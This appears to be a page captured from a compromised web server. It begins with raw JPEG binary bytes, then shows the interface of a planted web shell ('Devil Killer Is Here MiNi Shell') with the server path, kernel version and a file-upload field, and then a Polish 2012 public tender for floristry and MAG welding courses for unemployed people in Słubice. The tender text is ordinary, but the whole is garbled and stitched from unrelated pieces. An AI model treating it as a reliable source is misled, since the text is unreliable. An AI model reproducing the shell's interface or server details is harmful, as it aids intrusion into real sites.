JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120831/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120831/188393-N-2012.html

<p class="kh_header"><b>Słubice: Przedmiotem zamówienia jest przeprowadzenie 2 szkoleń grupowych dla 16 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Słubicach. Zamówienie podzielono na dwa zadania częściowe zgodnie z warunkami określonymi w SIWZ, które muszą być zrealizowane osobno. Pierwsze zadanie częściowe dotyczy przeprowadzenia szkolenia grupowego dla 8 osób w zakresie szkolenia Florysta. Drugie zadanie częściowe dotyczy przeprowadzenia szkolenia grupowego dla 8 osób w zakresie szkolenia Spawacz metodą MAG. Szkolenia finansowane są ze środków Funduszu Pracy w ramach Rezerwy Ministra.</b><br>
<b>Numer ogłoszenia: 188393 - 2012; data zamieszczenia: 31.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Słubicach , ul. Piłsudskiego 19, 69-100 Słubice, woj. lubuskie, tel. 0-95 758 3608, faks 0-95 758 3609.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupslubice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest przeprowadzenie 2 szkoleń grupowych dla 16 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Słubicach. Zamówienie podzielono na dwa zadania częściowe zgodnie z warunkami określonymi w SIWZ, które muszą być zrealizowane osobno. Pierwsze zadanie częściowe dotyczy przeprowadzenia szkolenia grupowego dla 8 osób w zakresie szkolenia Florysta. Drugie zadanie częściowe dotyczy przeprowadzenia szkolenia grupowego dla 8 osób w zakresie szkolenia Spawacz metodą MAG. Szkolenia finansowane są ze środków Funduszu Pracy w ramach Rezerwy Ministra..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Zadanie częściowe nr 1:
1) Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie usługi szkoleniowej w zakresie: Florysta dla 8 osób bezrobotnych, zarejestrowanych w Powiatowym Urzędzie Pracy w Słubicach finansowanego ze środków Funduszu Pracy w ramach Rezerwy Ministra.
Wspólny słownik zamówień CPV 80530000-8 - Usługi szkolenia zawodowego.
2) Program szkolenia powinien być opracowany w oparciu o standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępnych w bazach danych prowadzonych przez Departament Rynku Pracy Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl). 
3) Celem szkolenia jest uzyskanie umiejętności zawodowych w zakresie pracy florysty jako specjalisty w zakresie kreatywnego tworzenia dekoracji roślinnych różnego typu. Do głównych zadań florysty należą: opracowywanie projektów dekoracji roślinnych, tworzenie różnych form kompozycji roślinnych, przygotowywanie kompleksowego wystroju wnętrz oraz otwartej przestrzeni z użyciem materiału roślinnego. Zawód florysty wymaga interdyscyplinarnego przygotowania począwszy od strony historyczno-estetycznej dekoracji, wiedzy o stosowanych materiałach roślinnych i technicznych, aż po szeroki zakres wiedzy i umiejętności niezbędnych do tworzenia projektów dekoracji roślinnych na różne okazje oraz do ich realizacji. Po zakończeniu szkolenia w zakresie danej jednostki modułowej uczestnik szkolenia powinien nabyć minimum następujące umiejętności:
­	planowanie i organizowanie pracy własnej (w tym prowadzenie działalności gospodarczej) i podległych pracowników,
­	organizowanie zaopatrzenia w materiał roślinny i nieroślinny, wdrażanie nowości florystycznych.
­	pozyskiwanie zleceń na wykonanie dekoracji florystycznych,
­	prowadzenie promocji kwiatów i dekoracji florystycznych,
­	przygotowywanie materiałów roślinnych i nieroślinnych do ekspozycji, wykonywania różnego rodzaju wyrobów florystycznych i ich sprzedaży,
­	planowanie i wykonywanie projektów,
­	wykonywanie różnego rodzaju wyrobów florystycznych z materiałów roślinnych i nieroślinnych,
­	pielęgnowanie roślin ciętych, doniczkowych i gotowych dekoracji florystycznych,
­	dekorowanie różnych wnętrz i powierzchni zewnętrznych roślinami ciętymi i doniczkowymi,
­	sprzedaż, obsługa klienta i udzielanie porad dotyczących roślin ciętych, kwiatów doniczkowych i dekoracji florystycznych,
­	pakowanie i przygotowywanie do transportu i/lub przechowywania roślin ciętych, doniczkowych oraz gotowych wyrobów florystycznych,
­	konserwowanie/suszenie roślin różnymi metodami,
­	nadzorowanie i kierowanie pracą podległych osób, realizujących zadania,
­	uczestniczenie w procesie doskonalenia zawodowego,
­	zapewnianie jakości wyrobów florystycznych i przestrzeganie określonych procedur ich wykonania,
­	ocena jakości wykonanych dekoracji,
­	zabezpieczanie miejsca pracy oraz sprzętu i narzędzi do/po pracy.
4) Program szkolenia musi być zrealizowany w łącznym wymiarze 100 godzin zegarowych przypadających na każdego uczestnika szkolenia łącznie z niezbędnymi egzaminami. Godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę, liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny. Przerwy wliczają się w łączny czas trwania szkolenia, a elastyczny sposób organizowania przerw ma na celu dostosowanie godzin szkolenia do higieny nauczania, tj. ustalenia dopuszczalnych norm obciążenia nauką uczestników szkolenia, higienicznych metod nauczania z uwzględnieniem poszczególnych rodzajów zajęć oraz przeciwdziałanie zjawisku przemęczenia. Nie dopuszcza się skracania zajęć.
5) Kurs powinien być zrealizowany w ciągu maksymalnie 32 dni kalendarzowych, przy czym tygodniowy wymiar zajęć musi wynosić przeciętnie nie mniej niż 25 godzin, chyba że przepisy odrębne przewidują niższy wymiar szkolenia, natomiast dzienny wymiar zajęć nie może przekroczyć 8 godzin zegarowych.
6) Zajęcia muszą odbywać się w dni powszednie od poniedziałku do piątku z wyłączeniem dni wolnych od pracy w przedziale czasowym dostosowanym do możliwości dojazdu osób bezrobotnych po uprzedniej akceptacji Zamawiającego. 
7) Wykonawca w opisie warunków szkolenia winien dokładnie podać miejsce realizacji zajęć teoretycznych oraz praktycznych i w sposób szczegółowy opisać wyposażenie poszczególnych sal, w których prowadzone będą zajęcia dydaktyczne. W przypadku zajęć praktycznych należy wymienić ilość i rodzaj sprzętu oraz materiałów jakie będą wykorzystywane podczas zajęć. Wykonawca winien zapewnić każdemu uczestnikowi szkolenia swobodny dostęp do sprzętu i materiałów oraz samodzielne stanowisko pracy.
8) Wykonawca zapewni nieodpłatnie uczestnikom szkolenia napoje (gorące i zimne) podczas przerw.
9) Wykonawca zapewni w trakcie trwania szkolenia warunki zgodne z przepisami bezpieczeństwa 
i higieny pracy. Pomieszczenia, w których realizowane będą zajęcia szkoleniowe winny być bezwzględnie dostosowane do prowadzenia zajęć dla grupy minimum 8 osobowej. Wykonawca musi dla każdego uczestnika szkolenia zagwarantować miejsce siedzące (stolik/ławkę bądź krzesło z przystawką) umożliwiające swobodne sporządzanie notatek.
10) Wykonawca zapewni wszystkim uczestnikom szkolenia na własność materiały szkoleniowe wspomagające tematykę szkolenia oraz materiały do robienia notatek (zeszyt i długopis).
11) Wykonawca musi przedstawić do przeprowadzenia szkolenia lokal w Ośnie Lubuskim, w woj. lubuskim, który znajduje się w miejscu umożliwiającym dogodny dojazd środkami komunikacji publicznej lub dojście na pieszo.
12) Wykonawca zapewni, że siedziba w której ma być przeprowadzone szkolenie zapewnia odpowiednie warunki sanitarne, bezpieczeństwa i jakościowe, zgodnie z obowiązującymi przepisami, zapewni nadzór wewnętrzny i stały kontakt w miejscu szkolenia z osobą odpowiedzialną za obsługę szkolenia wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym.
13) Wykonawca zobowiązany jest do indywidualizacji kształcenia poprzez prowadzenie stałej oceny postępów poszczególnych uczestników szkolenia i zwiększenia pomocy wobec osób napotykających trudności w procesie nauczania. Dlatego w programie szkolenia w punkcie dotyczącym sposobów sprawdzania efektów szkolenia Wykonawca winien precyzyjnie określić w jaki sposób zamierza spełnić niniejsze zobowiązanie. 
14) W celu zapewnienia nadzoru wewnętrznego służącego podnoszeniu jakości szkolenia wymagane jest, aby Wykonawca wyznaczył osobę, która będzie sprawować stały, bezpośredni nadzór nad jakością realizowanego szkolenia oraz współpracować z Powiatowym Urzędem Pracy. Wyznaczona osoba powinna w sposób ciągły nadzorować przebieg szkolenia, kontrolować umiejętności i wiedzę słuchaczy uzyskiwaną podczas szkolenia poprzez przeprowadzanie testów i ćwiczeń praktycznych i innych sprawdzających czynności. Wszystkie przewidziane sprawdziany, egzaminy oraz inne formy sprawdzenia wiedzy i umiejętności prowadzące do uzyskania zaświadczeń wskazanych w pkt. 15 niniejszej SIWZ muszą być wliczone w całościowy koszt szkolenia. 
15) Szkolenie musi zakończyć się wydaniem stosownego zaświadczenia o ukończeniu kursu wg wzoru zgodnego z rozporządzeniem Ministra Edukacji Narodowej z dnia 11.01.2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012 poz. 186) zgodnie ze wzorem określonym w załączniku nr 6 do projektu umowy szkoleniowej w zakresie zadania częściowego nr 1  oraz wydaniem zaświadczenia o uczestnictwie w szkoleniu zgodnym z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. z 2010 r., nr 177, poz. 1193 z późn. zm.) zgodnie ze wzorem określonym w załączniku nr 5 do projektu umowy szkoleniowej w zakresie zadania częściowego nr 1. 
16) Wykonawca szkolenia zobowiązany jest do umieszczenia informacji o realizowanym szkoleniu na stronie www.inwestycjawkadry.pl, w terminie do 3 dni od daty zawarcia umowy oraz dokonywania aktualizacji tej informacji co najmniej raz w miesiącu. Wykonawca szkolenia jest także zobowiązany do przedłożenia Zamawiającemu potwierdzenia w formie pisemnej z podpisem przedstawiciela lub pełnomocnika zamieszczonej w/w informacji i każdej  jej aktualizacji w ciągu 3 dni od zamieszczenia 
i zaktualizowania.
17) Zamawiający nie dopuszcza realizacji zamówienia przez podwykonawców. Wykonawca nie jest obowiązany ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków, dlatego też nie należy kosztów ubezpieczenia wliczać w cenę wykonania usługi.	
2.	Zadanie częściowe nr 2:
1)	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie usługi szkolenia w zakresie: Spawacz metodą MAG dla 8 osób bezrobotnych, zarejestrowanych w Powiatowym Urzędzie Pracy w Słubicach finansowanego ze środków Funduszu Pracy w ramach Rezerwy Ministra.
Wspólny słownik zamówień CPV 80530000-8 - Usługi szkolenia zawodowego.
2)	Program szkolenia powinien być opracowany w oparciu o standardy kwalifikacji zawodowych 
i modułowe programy szkoleń zawodowych, dostępnych w bazach danych prowadzonych przez Departament Rynku Pracy Ministerstwa Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl). 
3)	Celem szkolenia jest praktyczne i teoretyczne przygotowanie uczestników szkolenia do wykonywania zawodu spawacza, tj. spawanie łukiem elektrycznym w osłonie aktywnych chemicznie gazów lub mieszanek gazowych elektrodą topliwą proste elementy konstrukcyjne wykonane ze stali niskowęglowej, wykorzystując do tego celu urządzenia do spawania w atmosferze gazów i półautomaty spawalnicze; posługuje się narzędziami ślusarskimi oraz przyrządami kontrolno-pomiarowymi. Po zakończeniu szkolenia uczestnik szkolenia powinien nabyć minimum następujące umiejętności:
­	bezpieczeństwo i higiena pracy przy spawaniu elektrycznym,
­	ochrona przeciwpożarowa prac spawalniczych,
­	czytanie i sporządzanie rysunku technicznego,
­	ulepszanie cieplne złączy spawanych,
­	dobór materiałów do spawania metodą MAG,
­	eksploatacja butli do gazów technicznych,
­	pomiary ciśnienia w zbiornikach,
­	obsługa reduktorów,
­	przygotowanie brzegów elementów do spawania,
­	wady połączeń spawalniczych,
­	kontrola złączy spawanych,
­	uruchomienie i obsługa stanowiska do spawania łukowego elektrodą topliwą w osłonie aktywnych, chemicznie gazów lub mieszanek gazowych - metodą MIG/MAG,
­	wykonanie złączy narożnych spoiną pachwinową metodą MAG,
­	wykonanie złączy doczołowych spoiną czołową bez ukosowania w pozycji podolnej A1 metodą MAG,
­	wykonanie złączy teowych spoiną pachwinową jedno- i dwustronną w pozycji nabocznej B1 metodą MAG,
­	wykonanie złączy doczołowych z ukosowaniem na Y w pozycji podolnej A1 metodą MAG,
­	wykonanie złączy doczołowych z ukosowaniem na Y w pozycji pionowej A4 metodą MAG,
­	wykonanie złączy doczołowych z ukosowaniem na pół V w pozycji naściennej A2 metodą MAG,
­	wykonanie złączy teowych spoiną pachwinową jedno- i dwustronną w pozycji pionowej B4, metodą MAG.4. 
4)	Program szkolenia musi być zrealizowany w łącznym wymiarze 135 godzin zegarowych przypadających na każdego uczestnika szkolenia łącznie z niezbędnymi egzaminami. Godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę, liczącą średnio 15 minut. Przerwy wliczają się w łączny czas trwania szkolenia, a elastyczny sposób organizowania przerw ma na celu dostosowanie godzin szkolenia do higieny nauczania, tj. ustalenia dopuszczalnych norm obciążenia nauką uczestników szkolenia, higienicznych metod nauczania z uwzględnieniem poszczególnych rodzajów zajęć oraz przeciwdziałanie zjawisku przemęczenia. Nie dopuszcza się skracania zajęć.
5)	Kurs powinien być zrealizowany w ciągu  maksymalnie 40 dni kalendarzowych, przy czym tygodniowy wymiar zajęć musi wynosić przeciętnie nie mniej niż 25 godzin, chyba że przepisy odrębne przewidują niższy wymiar szkolenia, natomiast dzienny wymiar zajęć nie może przekroczyć 8 godzin zegarowych.
6)	Zajęcia muszą odbywać się w dni powszednie od poniedziałku do piątku z wyłączeniem dni wolnych od pracy w przedziale czasowym dostosowanym do możliwości dojazdu osób bezrobotnych po uprzedniej akceptacji Zamawiającego. 
7)	Wykonawca w opisie warunków szkolenia winien dokładnie podać miejsce realizacji zajęć teoretycznych oraz praktycznych i w sposób szczegółowy opisać wyposażenie poszczególnych sal, w których prowadzone będą zajęcia dydaktyczne. W przypadku zajęć praktycznych Wykonawca musi dysponować salą wyposażoną w minimum 8 stanowisk, natomiast w ramach prowadzonych zajęć praktycznych Wykonawca winien zapewnić uczestnikom szkolenia swobodny dostęp do sprzętu, przy czym na jednym stanowisku spawalniczym szkolić się będą maksymalnie dwie osoby. W przypadku zajęć praktycznych należy wymienić ilość i rodzaj sprzętu i urządzeń jakie będą wykorzystywane podczas zajęć.
8)	Wykonawca zapewni nieodpłatnie uczestnikom szkolenia napoje (gorące i zimne) podczas przerw.
9)	Wykonawca zapewni w trakcie trwania szkolenia warunki zgodne z przepisami bezpieczeństwa 
i higieny pracy. Pomieszczenia, w których realizowane będą zajęcia szkoleniowe winny być bezwzględnie dostosowane do prowadzenia zajęć dla grupy minimum 8 osobowej. Wykonawca musi dla każdego uczestnika szkolenia zagwarantować miejsce siedzące (stolik/ławkę bądź krzesło 
z przystawką) umożliwiające swobodne sporządzanie notatek.
10)	Wykonawca zapewni wszystkim uczestnikom szkolenia na własność materiały szkoleniowe wspomagające tematykę szkolenia oraz materiały do robienia notatek (zeszyt i długopis).
11)	Wykonawca musi przedstawić do przeprowadzenia szkolenia lokal w Słubicach, w woj. lubuskim, który znajduje się w miejscu umożliwiającym dogodny dojazd środkami komunikacji publicznej lub dojście na pieszo.
12)	Wykonawca zapewni, że siedziba w której ma być przeprowadzone szkolenie zapewnia odpowiednie warunki sanitarne, bezpieczeństwa i jakościowe, zgodnie z obowiązującymi przepisami, zapewni nadzór wewnętrzny i stały kontakt w miejscu szkolenia z osobą odpowiedzialną za obsługę szkolenia wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym.
13)	Wykonawca zobowiązany jest do indywidualizacji kształcenia poprzez prowadzenie stałej oceny postępów poszczególnych uczestników szkolenia i zwiększenia pomocy wobec osób napotykających trudności w procesie nauczania. Dlatego w programie szkolenia w punkcie dotyczącym sposobów sprawdzania efektów szkolenia Wykonawca winien precyzyjnie określić w jaki sposób zamierza spełnić niniejsze zobowiązanie. 
14)	W celu zapewnienia nadzoru wewnętrznego służącego podnoszeniu jakości szkolenia wymagane jest, aby Wykonawca wyznaczył osobę, która będzie sprawować stały, bezpośredni nadzór nad jakością realizowanego szkolenia oraz współpracować z Powiatowym Urzędem Pracy. Wyznaczona osoba powinna w sposób ciągły nadzorować przebieg szkolenia, kontrolować umiejętności i wiedzę słuchaczy uzyskiwaną podczas szkolenia poprzez przeprowadzanie testów i ćwiczeń praktycznych i innych sprawdzających czynności. Wszystkie przewidziane sprawdziany, egzaminy oraz inne formy sprawdzenia wiedzy i umiejętności prowadzące do uzyskania zaświadczeń wskazanych w pkt. 15 niniejszej SIWZ muszą być wliczone w całościowy koszt szkolenia.
15)	Szkolenie musi zakończyć się egzaminem państwowym oraz wydaniem stosownych dokumentów świadczących o ukończeniu szkolenia oraz nabytych umiejętnościach tj.  świadectwo egzaminu spawacza oraz Książka spawacza zgodne z rozporządzeniem Ministra Gospodarki z dnia 27 kwietnia 2000 r. w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz. U. z 2000 r. Nr 40, poz. 470 z późn. zm.) oraz wydaniem zaświadczenia o uczestnictwie w szkoleniu zgodnego z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177, poz. 1193 z 2010r z późn. zm.) zgodnie ze wzorem określonym w załączniku nr 5  do projektu umowy szkoleniowej w zakresie zadania częściowego nr 2.
16)	Wykonawca szkolenia zobowiązany jest do umieszczenia informacji o realizowanym szkoleniu na stronie www.inwestycjawkadry.pl, w terminie do 3 dni od daty zawarcia umowy oraz dokonywania aktualizacji tej informacji co najmniej raz w miesiącu. Wykonawca szkolenia jest także zobowiązany do przedłożenia Zamawiającemu potwierdzenia w formie pisemnej z podpisem przedstawiciela lub pełnomocnika zamieszczonej w/w informacji i każdej  jej aktualizacji w ciągu 3 dni od zamieszczenia i zaktualizowania.
17)	Zamawiający nie dopuszcza realizacji zamówienia przez podwykonawców. Wykonawca nie jest obowiązany ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków, dlatego też nie należy kosztów ubezpieczenia wliczać w cenę wykonania usługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, oceniane będzie na podstawie oświadczenia stanowiącego załącznik nr 2 do SIWZ. Działalność prowadzona na potrzeby przedmiotu zamówienia wymaga posiadania wpisu do rejestru instytucji szkoleniowych wydawany przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej (zgodnie Rozporządzeniem Ministra Gospodarki i Pracy z dnia 15 grudnia 2010r. zmieniającym rozporządzenie w sprawie rejestru instytucji szkoleniowych Dz. U. z 2010r. Nr 241 poz. 16</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie 3 usługi szkoleniowe potwierdzone dokumentem, że te usługi zostały wykonane lub są wykonywane należycie). Spełnienie warunku posiadania wiedzy i doświadczenia oceniane będzie na podstawie wykazu zrealizowanych szkoleń wraz z dokumentami potwierdzającymi, że usługi zostały wykonane należycie - załącznik nr 2 oraz 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. zadania częściowego nr 1: dysponują lub będą dysponować co najmniej 4 samodzielnymi stanowiskami (1 stanowisko florystyczne przypadające na maksymalnie 2 uczestników szkolenia), przystosowanymi do praktycznej nauki w zawodzie florysty, tj. odpowiednim sprzętem, materiałami oraz wyposażeniem umożliwiającym w sposób nieprzerwalny w ciągu całego przewidzianego wymiaru czasu szkolenia na samodzielną pracę zmierzającą do przyuczenia się w zawodzie florysty,
dot. zadania częściowego nr 2: dysponują lub będą dysponować co najmniej 4 samodzielnymi stanowiskami (1 stanowisko spawalnicze przypadające na maksymalnie 2 uczestników szkolenia), przystosowanymi do praktycznej nauki w zakresie spawania metodą MAG wykorzystywanymi w procesie nauczania, tj. sprawnie funkcjonującą, nieuszkodzoną i warunkującą bezpieczne użycie spawarką przeznaczoną do spawania metodą MAG, wszelką odzież oraz sprzęt ochronny a także inne wyposażenie i materiały niezbędne do bezpiecznej nauki spawania metodą MAG.
Spełnienie warunku dysponowania odpowiednim potencjałem technicznym oceniane będzie na podstawie wykazu niezbędnych do wykonania zamówienia narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy - załącznik nr załącznik nr 2 oraz 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują minimum 2 osobami, które będą uczestniczyć w wykonywaniu zamówienia i posiadają minimum średnie wykształcenie, przygotowanie  i doświadczenie zawodowe zgodne z tematyką realizowanego przedmiotu zamówienia, posiadają przygotowanie pedagogiczne, określone w rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009r. nr 50 poz. 400 z późn. zm.) i każda z nich przeprowadziła co najmniej 50 godz. lekcyjnych w zakresie przeznaczonego do realizacji przedmiotu. 
Spełnienie warunku dysponowania osobami zdolnymi do wykonywania zamówienia oceniane będzie na podstawie wykazu osób i podmiotów, które będą wykonywać zamówienie - załącznik nr 2 oraz 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
